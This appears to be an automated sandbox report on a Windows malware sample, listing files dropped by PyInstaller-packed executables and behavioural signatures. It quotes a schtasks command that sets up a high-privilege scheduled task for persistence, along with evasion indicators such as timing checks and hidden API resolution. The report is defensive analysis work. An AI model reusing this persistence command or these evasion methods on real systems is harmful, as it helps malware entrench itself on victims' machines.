Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_cffi_backend.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\libssl-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\bcrypt\_bcrypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\python3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\charset_normalizer\md.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\libffi-7.dll Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn XHdU9gx7 /tr "C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe" /sc once /st 05:31 /RL HIGHEST /f
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC155B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 15_2_00007FF7ADC155B0
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3251 rdtsc 16_2_00007FFD839E3251
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Window / User API: threadDelayed 847 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Window / User API: threadDelayed 9151 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Window / User API: foregroundWindowGot 1775 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Window / User API: threadDelayed 5462 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Window / User API: threadDelayed 4536 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Window / User API: foregroundWindowGot 1775 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\bcrypt\_bcrypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\cryptography\hazmat\bindings\_openssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\win32wnet.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_queue.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\python38.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\charset_normalizer\md__mypyc.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\pywin32_system32\pywintypes38.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\charset_normalizer\md.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\python3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\VCRUNTIME140_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_queue.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_ssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\python38.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\VCRUNTIME140_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\win32wnet.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\pywin32_system32\pywintypes38.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
